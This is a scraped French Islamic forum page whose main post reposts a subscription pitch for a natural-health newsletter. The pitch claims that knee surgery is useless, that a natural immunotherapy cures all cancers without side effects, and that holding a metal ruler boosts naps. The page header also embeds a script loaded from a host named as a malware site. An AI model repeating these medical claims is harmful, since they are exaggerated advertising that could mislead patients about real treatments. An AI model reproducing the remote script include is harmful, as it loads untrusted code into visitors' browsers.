ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    Arthrose du genou : pourquoi il est inutile de se faire opérer

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Arthrose du genou : pourquoi il est inutile de se faire opérer

    Message par assalafia le Sam 5 Sep - 12:09

    Arthrose du genou : pourquoi il est inutile de se faire opérer

    Chère lectrice, cher lecteur,

    C'est une information capitale qui a pu vous échapper dans mon précédent message.

    Vous ou l'un de vos proches y a probablement déjà été confronté : en cas d'arthrose sévère au genou, les médecins conseillent souvent une chirurgie qui consiste à enlever la partie du ménisque abimée (méniscectomie) ou de régulariser des lésions du cartilage (débridement).

    Or, la plupart du temps, le patient présentant cette pathologie se voit passer sur la table d'opération sans même connaître la réponse à une question pourtant cruciale : et si ça ne servait à rien ?

    Des chercheurs se sont heureusement posé cette question, et ils ont rassemblé plusieurs études portant sur des patients ayant subi ces opérations. Et les résultats font froid dans le dos :


    1. Après un soulagement de six mois, la douleur revient à l'identique.

    2. D'après les patients, cette opération chirurgicale n'a pas plus d'effet que le paracétamol sur la douleur.


    En ce qui concerne la mobilité du genou, la chirurgie n'a apporté strictement aucun bénéfice.

    Cette information très importante pour votre santé et celle de vos proches fait l'objet d'un article dans la nouvelle édition d'Alternatif Bien-Être que nous nous apprêtons à mettre sous presse lundi prochain à la première heure.

    Comme toujours les 31 autres pages de cette nouvelle édition sont bourrées de conseils et informations de santé utiles au quotidien mais aussi passionnants et engageants pour une démarche de santé au naturel.

    Je vous parlais hier déjà de « La fin du cancer dans 10 ans », grand dossier de ce numéro à paraître.

    Or ce matin, je découvre une nouvelle étude commencée il y a 5 ans et publiée récemment dans la revue Science Translational Medicine. Je vous livre la conclusion :

    La durabilité des rémissions observée dans cette étude confirme cette immunothérapie, après la chimiothérapie, comme une nouvelle stratégie thérapeutique prometteuse et comme une alternative à la greffe de moelle osseuse.
    J'avais reçu quelques messages un peu amusés hier me demandant si j'étais bien sérieux de « prédire » la fin du cancer dans 10 ans. Je ne peux que vous inviter à relire attentivement cet article :

    La fin du cancer dans 10 ans ?

    Oui vous avez bien lu.

    Grâce à une thérapie révolutionnaire, le compte à rebours a peut-être commencé.

    Le plus incroyable est que cette thérapie repose sur une idée simple et naturelle, que vous allez découvrir à la une d'un numéro d'octobre d'Alternatif Bien-Être vraiment extraordinaire.

    Vous allez voir que la meilleure arme contre le cancer pourrait venir de l'intérieur de nous-même

    Et vous allez comprendre pourquoi cela change tout.

    La meilleure arme contre le cancer est naturelle

    Il faut simplement avoir en tête le principe suivant : une cellule cancéreuse n'est pas une cellule normale, c'est une cellule malade. Notre organisme le sait bien et il le détecte : il a le pouvoir d'attaquer les cellules cancéreuses pour les détruire.

    Très souvent, ce processus fonctionne car il a lieu suffisamment tôt. Et c'est ainsi que nous développons tous des cancers au cours de notre vie sans jamais le savoir : ils ont déjà été détruits par notre système immunitaire.

    L'idée est alors d'apprendre à notre organisme à mieux repérer et traiter les cellules cancéreuses.

    C'est ce qu'on appelle « l'immunothérapie », qui se présente aujourd'hui sous deux formes :


    • L'injection de molécules inflammatoires qui stimulent directement l'immunité (interféron, interleukine 2). Il s'agit de substances initialement naturellement produites par notre organisme.

    • L'injection d'anticorps obtenus par génie génétique, les « anticorps monoclonaux » (bevacizumab, cetuximab, etc.) dirigés contre certaines protéines des cellules cancéreuses.


    Malheureusement, ces immunothérapies souffrent aussi d'effets secondaires parfois sérieux (même s'ils sont moins importants que ceux des chimio ou radiothérapie).

    Voilà pourquoi l'avenir se trouve probablement dans une autre forme d'immunothérapie, qui a ceci de singulier qu'elle est naturelle et qu'elle ne provoque aucun effet secondaire.

    100 % des femmes cancéreuses encore en vie !

    Le principe est simple : prendre des lymphocytes chez un malade du cancer, les cultiver pour en obtenir un très grand nombre, vérifier qu'ils réagissent bien en présence de la tumeur, puis les réinjecter chez le malade.

    En d'autres termes, il s'agit de traiter le cancer en mobilisant les lignes de défense de notre propre organisme après en avoir décuplé la puissance naturellement. C'est ce qu'on appelle « l'immunothérapie autologue ». Ses résultats sont saisissants :


    • Au Japon, une synthèse de données sur plus de 1400 malades a montré qu'elle améliorait les chances de survie de 30 % comparativement aux traitements classiques [1].

    • Dans une autre étude, 100 % des femmes qui avaient bénéficié de l'immunothérapie étaient encore en vie au bout de 3 ans contre seulement 67,5 % chez celles ayant suivi un traitement classique [2].


    Ces résultats méritent d'être confortés par de nouvelles études, mais ils représentent déjà un immense espoir !

    Par ailleurs, l'intelligence de cette thérapie en fait une méthode efficace sur tous les cancers et il est probable que l'amélioration de la technique pourrait conduire à des protocoles n'utilisant que cette immunothérapie, sans chimio ni radiothérapie complémentaires.

    La fin du cancer…

    Seule ombre au tableau : il va falloir encore un peu patienter…

    Vous découvrirez dans l'article d'Alternatif Bien-Être les raisons sidérantes qui retardent la mise en place de l'immunothérapie.

    Nous avons choisi de vous en parler malgré leur aspect vraiment « décourageant ». Car cela ne doit pas nous abattre, au contraire.

    Cela nous donne à tous, lecteurs d'Alternatif Bien-Être, citoyens passionnés par la santé publique, les médecines douces ou simples amoureux de la vie, une obligation en commun : faire connaître ces thérapies, en parler autour de nous, à nos proches, à notre médecin, pour que les grands médias s'y intéressent enfin et qu'on facilite les travaux des groupes de recherche qui poursuivent leurs études dans cette direction.

    Car heureusement des chercheurs continuent d'avancer, vous le verrez. C'est grâce à eux que parfois, on voit des journaux annoncer « la fin du cancer d'ici 10 ans ».

    Un chiffre optimiste peut-être, mais qui porte en lui aussi une idée simple et belle : on y arrivera !

    C'est vraiment un numéro d'Alternatif Bien-Être d'une densité extraordinaire que je vous propose de découvrir en octobre, comme vous allez pouvoir en juger avec ces autres exemples, qui ne sont que quelques-uns des sujets traités dans cette édition.

    Parkinson : tombé malade après avoir bu…du thé !

    La maladie de Parkinson est la deuxième maladie neurodégénérative chronique la plus fréquente après Alzheimer. À 65 ans, 1 % de la population en souffre, et ce chiffre devrait doubler dans les prochaines années.

    Si l'on en croit le discours officiel, les causes de cette terrible maladie sont encore inconnues.

    En réalité, on n'en sait déjà que trop.

    La véritable cause de la maladie de Parkinson, ce sont les autorités sanitaires françaises qui la donnent lorsqu'ils reconnaissent le statut de « maladie professionnelle » aux agriculteurs qui en sont victimes [3] !

    Car ce sont bien les pesticides qui sont incriminés. Les composés organochlorés seraient les principaux responsables, avec une dangerosité décuplée quand ils sont associés à certains insecticides et herbicides [4] [5].

    Récemment, à Taïwan, on a découvert qu'un homme est tombé malade de Parkinson après avoir bu du thé : on y a trouvé des traces importantes de DDT, un pesticide pourtant interdit !

    Mesures d'urgence à adopter chez soi

    Voilà pourquoi il y a urgence à se protéger, d'autant que le lobbying très efficace des fabricants de pesticides ralentit leur interdiction.

    Dans ce numéro d'Alternatif Bien-Être, vous trouverez les premières mesures à adopter pour se mettre (un peu) à l'abri : éviter l'eau du robinet, manger bio, reconnaître les trois substances à fuir le plus possible (tétrachlorure de carbone, trichloroéthylène et perchloroéthylène),etc.

    Attention aussi à l'excès de fer (l'analyse du cerveau de malades parkinsoniens a montré une accumulation de fer, en particulier dans le locus niger, la zone cérébrale qui dégénère progressivement).

    Vous découvrirez aussi un plan de bataille complet pour faire face au stress oxydant dans le cerveau et protéger les neurones de la dégénérescence :


    • Un régime alimentaire pro-acide urique (à essayer uniquement si vous n'êtes pas à risque de souffrir de goutte ou de diabète).

    • Certains aliments réduisent les risques ou ralentissent la progression de la maladie : les graisses polyinsaturées, en particulier de la famille des oméga-3 [6] : lin, colza, noix, cameline… Les fruits rouges riches en flavonoïdes [7] : fraise, myrtille, framboise, canneberge… La cannelle de Ceylan [8], le poivron et les solanacées (tomate, aubergine, pomme de terre).

    • La pratique d'une activité physique : avec des exercices d'étirement ou d'équilibre, les symptômes moteurs (équilibre, souplesse, tremblements) s'améliorent déjà ; mais vous verrez qu'une activité en particulier permet des améliorations encore plus nettes et persistantes sur le long terme.


    Je vous l'ai dit, ce numéro d'octobre d'Alternatif Bien-Être est truffé d'informations de pointe sur la santé naturelle, pour vous alerter des risques, mais aussi pour vous donner des solutions inédites à des problèmes qui peuvent paralyser la vie quotidienne. Comme le sommeil, avec une façon vraiment étonnante pour profiter au maximum de son pouvoir récupérateur.

    Technique incroyable pour s'endormir

    Je vous le dis d'emblée : toutes les siestes que j'ai faites jusqu'à présent auraient été différentes avec cette technique !

    Bien sûr, je savais comme tout le monde que la sieste est excellente, contrairement à ce que disent tous les chefs de service des bureaux du monde entier.

    Je savais aussi qu'une « bonne sieste » est une sieste courte (la NASA estime entre 15 et 20 minutes la durée idéale d'un sommeil réparateur pour ses propres astronautes).

    Mais jamais je n'aurais imaginé que ces trois conseils en apparence complètement insensés puissent donner une telle puissance réparatrice à la sieste. Ainsi vous allez découvrir pourquoi il faut :


    • Boire une tasse de café juste avant de commencer sa sieste,

    • S'endormir dans un environnement bruyant (!!!),

    • Tenir un objet métallique (comme une règle) à la verticale, au creux de sa main posée sur une table ou le bureau


    Vous allez voir qu'il ne s'agit pas d'une «méthode d'illuminé» ou de la dernière lubie d'un gourou à la mode.

    Les résultats de cette méthode sont époustouflants : non seulement le sentiment de fatigue est très nettement diminué, mais ce type de sommeil a un effet bénéfique sur les capacités de mémorisation, qui peuvent être multipliées par 5 !

    Comme toujours, les journalistes d'Alternatif Bien-Être ne se contentent pas de publier les résultats des dernières études scientifiques, ils testent eux-mêmes les méthodes et les protocoles dont ils rendent compte dans leurs articles. Notamment ce mois-ci sur des sujets aussi importants que l'alimentation.

    Régime frugivore : ce qu'il fait dans votre corps

    « J'avais fait la connaissance d'un homme qui disait se nourrir exclusivement de fruits, à l'exception d'un repas « normal » – végétarien tout de même ! – par semaine »

    « À 54 ans, il avait la morphologie d'un coureur de fond et s'entrainait quotidiennement à divers sports. Sa silhouette, sa chevelure abondante et ses traits juvéniles le faisaient paraître facilement dix ans de moins que son âge ».

    Voici les premières lignes du récit d'une expérience exceptionnelle sur le frugivorisme que vous allez découvrir dans le numéro d'octobre d'Alternatif Bien-Être, où notre collaborateur Emmanuel Ducoq raconte comment il a testé ce mode alimentaire controversé (à juste titre, vous verrez !).

    Au menu : activité physique intensive, aucun aliment d'origine animale, pas de céréales ni de légumineuses, et surtout ni huile, ni graisse ajoutée, ni sel, ni herbes, ni épices. Rien que des fruits de qualité biologique, crus mais bien mûrs, ainsi que quelques légumes feuilles et autres végétaux tendres…

    Adieu la batterie de cuisine. Bonjour la corbeille de fruits ! Ou plutôt le cageot ; car voici ce qu'il faut pour une seule journée : une douzaine de bananes, quatre grosses mangues, un demi-chou chinois, cinq kiwis, un kilo de courge et 30 g de noix…

    Un corps invulnérable (en apparence)

    Vous trouverez dans ce numéro d'Alternatif Bien-Être le journal de bord de cette aventure exceptionnelle. Le premier cageot, l'état général après trois jours, ce qui peut arriver à vos selles, l'impressionnant changement physique après quelques semaines et l'étonnante sensation d'avoir un corps devenu…invulnérable.

    Vous verrez comment mange le frugivore en été, comment l'automne est une saison propice à une orgie de pommes, de raisins et de kakis…

    Et vous découvrirez les effets dramatiques qui se sont produits, un an après le début de cette expérience…

    Également dans ce numéro d'octobre d'Alternatif Bien-Être :


    • Champignons. Problème avec la consommation d'espèces « sans danger ». Savez-vous ce que des morilles mal cuites sont capables de faire ? Et ce qui se passe si vous buvez un verre de vin en mangeant un délicieux coprin noir d'encre, pourtant parfaitement comestible…Nous vous donnons les trois règles pour une consommation de champignon réussie et le traitement naturel sensationnel pour réagir en cas d'intoxication (Il a remis sur pied sans aucune séquelle une portugaise qui avait avalé une poêlée de redoutables amanites phalloïdes).

    • Eczéma : avez-vous essayé les plantes drainantes comme la saponaire, la pensée sauvage, le pissenlit ou la feuille de cassis ? On peut les consommer seules ou en mélange, en cure de 1 à 2 mois, en infusion, en extrait fluide ou alcoolique à boire dans l'eau. Le bourgeon de cassis en macérât glycériné est utile pour équilibrer le terrain allergique et diminuer l'inflammation. Notre recette détaillée dans ce numéro.

    • Crises d'angoisse : stupéfiante explication. Des chercheurs ont découvert que la composition de la flore intestinale était liée à l'apparition des crises d'angoisse : les personnes qui consomment plus d'aliments fermentés en ont moins que les autres. Mais ils ont aussi identifié deux autres causes vraiment inattendues (cela vous intéressera particulièrement si vous avez un…ordinateur !). Et une solution naturelle d'urgence en cas de crise.

    • Les autorités l'appellent « l'ennemi numéro 1 de la santé publique »…Vous allez adorer cet homme et ses conseils sur la meilleure façon de manger.

    • L'étrange maladie qui résulte d'une carence simultanée de zinc et de fer. Elle pousse subitement des gens normaux à avoir des comportements complètement délirants.

    • Bain toxique. Le point commun entre les M&M's, les Mentos, les chewing-gums Hollywood, Freedent, Malabar mais aussi les gâteaux LU, les raviolis Panzani, le hachis parmentier William Saurin, les blanquettes de veau Leader Price et encore beaucoup d'autres produits ? Leur fabricant leur ont fait prendre le même bain toxique. Nous vous donnons l'indice qui permet de s'en rendre compte.


    A lire aussi dans le numéro d'octobre d'Alternatif Bien-Être :


    • Cinq signes que vous manquez de testostérone (et les ennuis qui vont avec).

    • Nouvelle embêtante sur le chocolat.

    • Un avocat, un quart d'ananas, une poignée d'épinards : notre recette pour préparer le délicieux smoothie qui protège des AVC.

    • Cholestérol : la supplémentation indispensable si vous prenez des statines.

    • Les légumes à forte concentration de thylakoïdes font vraiment maigrir (vous verrez comment apprendre à les reconnaître).


    C'est le lundi 7 septembre que nous mettons ce numéro d'octobre sous presse. Pour recevoir vous aussi votre exemplaire, inscrivez-vous avant le dimanche 6 septembre minuit à l'aide du lien sécurisé ci-dessous.

    Cliquez ici pour en savoir plus sur Alternatif Bien-Être et accéder au formulaire d'abonnement sécurisé.

    A votre santé,

    Jean-Marc Dupuis

      La date/heure actuelle est Lun 20 Nov - 5:03